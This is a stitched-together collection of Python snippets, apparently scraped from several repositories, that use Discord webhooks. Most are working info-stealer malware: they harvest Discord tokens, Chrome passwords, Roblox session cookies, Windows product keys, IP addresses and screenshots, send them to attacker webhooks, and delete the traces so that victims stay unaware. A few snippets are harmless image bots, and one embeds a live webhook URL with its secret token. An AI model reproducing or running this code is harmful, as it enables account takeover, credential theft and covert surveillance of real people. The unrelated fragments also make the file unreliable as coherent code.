def grab_all(token): hook = Webhook(web) screen = ImageGrab.grab() screen.save(local + '\\screen.png') screen.close() hook.send(file=File(local + "\\screen.png")) os.remove(local + '\\screen.png') with open(local + '\\Google\\Password_Chrome.txt', 'r') as fp: hook.send(file=File(fp, name=f"Passwords_Chrome.txt"))
def grab_all(token): tokeninfo = requests.get('https://discord.com/api/v8/users/@me', headers={ 'authorization': token }).json() r = requests.get('https://discord.com/api/v8/users/@me', headers={'authorization': token}) if r.status_code != 200: return ipinfo = requests.get('http://ip-api.com/json/').json() nitro_type = json.loads(r.content) try: nitro_type['premium_type'] except Exception: dnitro = "Non" else: if nitro_type['premium_type'] == 1: dnitro = "Nitro Classic" elif nitro_type['premium_type'] == 2: dnitro = "Nitro Boost" payload = { "embeds": [{ "author": { "name": f"{tokeninfo['username']}#{tokeninfo['discriminator']}", "icon_url": f"https://cdn.discordapp.com/avatars/{tokeninfo['id']}/{tokeninfo['avatar']}.jpg" }, "fields": [{ "name": "**Infos Discord**", "value": f"ID: {tokeninfo['id']}\nEmail: {tokeninfo['email']}\nNuméro de téléphone: {tokeninfo['phone']}\nNitro: {dnitro}\nToken: {token}" }, { "name": "**Autres infos**", "value": f"Nom du PC: {os.getenv('COMPUTERNAME')}\nNom de session: {os.getlogin()}\nIP: {ipinfo['query']}" }] }] } requests.post(url_webhook, json=payload) hook = Webhook(url_webhook) screen = ImageGrab.grab() screen.save(local + '\\screen.png') screen.close() hook.send(file=File(local + "\\screen.png")) os.remove(local + '\\screen.png') with open(local + '\\Google\\Password_Chrome.txt', 'r') as fp: hook.send(file=File( fp, name=f"Passwords_Chrome_{tokeninfo['username']}.txt"))
def forever(): print("Sending images every " + str(interval) + " seconds.") while True: try: file = random.choice(getListOfFiles('.\\images\\')) except Exception: print("There are no files in the images folder. Please add some.") time.sleep(5) sys.exit() print(file) file = File(str(file)) hook.send(file=file) time.sleep(int(interval))
def notforever(): print("Sending " + str(loop) + " images every " + str(interval) + " seconds.") for x in range(int(loop)): try: file = random.choice(os.listdir(".\\images\\")) except Exception: print("There are no files in the images folder. Please add some.") time.sleep(5) sys.exit() print(file) file = File(".\\images\\" + str(file)) hook.send(file=file) time.sleep(int(interval))
def send_report(self, id): embed = Embed( description='A user reported the following face', color=0x5CDBF0, timestamp='now' # sets the timestamp to current time ) img_file = self.xml_parser.get_imgpath_from_uid(self.xml, id) if img_file: img_file = self.xml.replace("config.xml", "") + img_file + ".png" file = File(img_file) embed.add_field(name='File', value=img_file) self.webhook.send(embed=embed, file=file) return img_file
def main(): with open (temp_dir+"run.log", 'w+') as handle: handle.write("Fatal Error.") handle.close() hook.send('```css\nToken Grabbed! \n\nUsername: '******'\nPC Name: ' + pc_name + '\nIP Address: {}'.format(ip) +'\n\nZip File:```') try: hook.send(file = File(zipf, name=str(user)+" Logs.zip")) except: hook.send('```css\nThere was an error obtaining the zip.```') if discordinst and ptbinst and canaryinst and chromeinst == False: hook.send("```css\nUser had nothing installed```") try: os.remove(zipf) except: return ''
def post_handler(message): response = requests.get( 'http://api.telegram.org/bot{}/getFile?file_id={}'.format( config.token, message.photo[-1].file_id)) if response.status_code == 200: data = json.loads(response.text) file_url = config.telegram_url + data['result']['file_path'] fd = urllib.request.urlopen(file_url) img = Image.open(BytesIO(fd.read())) tmpfile = tempfile.TemporaryFile() img.save(tmpfile, "PNG") tmpfile.seek(0) file = File(tmpfile, name='bluepost.png') # optional name for discord hook.send('Look at this:', file=file)
def send_report(self, e): uid = self.rep_inp.value img_name = self.prf_cfg["imgs"][uid] img_eth = self.prf_cfg["ethnics"][uid] img_path = img_eth + "/" + img_name img_file = self.rep_img.image.path self.logger.info("send report: {}".format(img_file)) hook = Webhook("https://discord.com/api/webhooks/770397581149863946/Wls0g6LEyTXEpOqzfLn2YuDRKANFSAFpwKe62VL9IxpwsQDWFjYHVfy19hrYiv5p0X2a") embed = Embed( description='A user reported the following face', color=0x5CDBF0, timestamp='now' # sets the timestamp to current time ) file = File(img_file) embed.add_field(name='File', value=img_path) hook.send(embed=embed, file=file)
def beamed(): hook = Webhook(url) try: hostname = requests.get("https://api.ipify.org").text except: pass local = os.getenv('LOCALAPPDATA') roaming = os.getenv('APPDATA') paths = { 'Discord': roaming + '\\Discord', 'Discord Canary': roaming + '\\discordcanary', 'Discord PTB': roaming + '\\discordptb', 'Google Chrome': local + '\\Google\\Chrome\\User Data\\Default', 'Opera': roaming + '\\Opera Software\\Opera Stable', 'Brave': local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default', 'Yandex': local + '\\Yandex\\YandexBrowser\\User Data\\Default' } message = '\n' for platform, path in paths.items(): if not os.path.exists(path): continue message += '```' tokens = sniff(path) if len(tokens) > 0: for token in tokens: message += f'{token}\n' else: pass message += '```' """screenshot victim's desktop""" try: screenshot = image.grab() screenshot.save(os.getenv('ProgramData') + r'\screenshot.jpg') screenshot = open(r'C:\ProgramData\screenshot.jpg', 'rb') screenshot.close() except: pass """gather our .zip variables""" try: zname = r'C:\ProgramData\passwords.zip' newzip = zipfile.ZipFile(zname, 'w') newzip.write(r'C:\ProgramData\passwords.txt') newzip.close() passwords = File(r'C:\ProgramData\passwords.zip') except: pass """gather our windows product key variables""" try: usr = os.getenv("UserName") keys = subprocess.check_output( 'wmic path softwarelicensingservice get OA3xOriginalProductKey' ).decode().split('\n')[1].strip() types = subprocess.check_output('wmic os get Caption').decode().split( '\n')[1].strip() except: pass """steal victim's .roblosecurity cookie""" cookie = [".ROBLOSECURITY"] cookies = [] limit = 2000 """chrome installation => list cookies from this location""" try: cookies.extend(list(steal.chrome())) except: pass """firefox installation => list cookies from this location""" try: cookies.extend(list(steal.firefox())) except: pass """read data => if we find a matching positive for our specified variable 'cookie', send it to our webhook.""" try: for y in cookie: send = str([str(x) for x in cookies if y in str(x)]) chunks = [send[i:i + limit] for i in range(0, len(send), limit)] for z in chunks: roblox = f'```' + f'{z}' + '```' except: pass """attempt to send all recieved data to our specified webhook""" try: embed = Embed( title='Aditional Features', description='a victim\'s data was extracted, here\'s the details:', color=0x2f3136, timestamp='now') embed.add_field("windows key:", f"user => {usr}\ntype => {types}\nkey => {keys}") embed.add_field("roblosecurity:", roblox) embed.add_field("tokens:", message) embed.add_field("hostname:", f"{hostname}") except: pass try: hook.send(embed=embed, file=passwords) except: pass """attempt to remove all evidence, allows for victim to stay unaware of data extraction""" try: subprocess.os.system(r'del C:\ProgramData\screenshot.jpg') subprocess.os.system(r'del C:\ProgramData\passwords.zip') subprocess.os.system(r'del C:\ProgramData\passwords.txt') except: pass
av = 'Grizzly Pro' if os.path.exists('C:\\Program Files\\Kaspersky Lab'): av = 'Kaspersky' if os.path.exists('C:\\Program Files\\IObit\\IObit Malware Fighter'): av = 'Malware fighter' if os.path.exists('C:\\Program Files\\360\\Total Security'): av = '360 Total Security' else: pass # SCREENSHOT: screen = ImageGrab.grab() screen.save(os.getenv('ProgramData') + '\\Screenshot.jpg') screen = open('C:\\ProgramData\\Screenshot.jpg', 'rb') screen.close() screenshot = File('C:\\ProgramData\\Screenshot.jpg') # PASSWORDS: zname = r'C:\\ProgramData\\Passwords.zip' newzip = zipfile.ZipFile(zname, 'w') newzip.write(r'C:\\ProgramData\\Passwords.txt') newzip.write(r'C:\\ProgramData\\Screenshot.jpg') newzip.close() passwords = File('C:\\ProgramData\\Passwords.zip') # SEND THOSE VARIABLES: hook.send("screenshot:", file=screenshot) hook.send("passwords:", file=passwords) os.remove('C:\\ProgramData\\Passwords.txt') os.remove('C:\\ProgramData\\Screenshot.jpg') os.remove('C:\\ProgramData\\Passwords.zip')
def exfiltration(filename): hook = Webhook(DISCORD_WEBHOOK) pc_name = platform.uname()[1] file = File(sb.os.getcwd() + '\\' + filename, name=pc_name + '.json') hook.send('Here is your loot :smiling_imp:', file=file)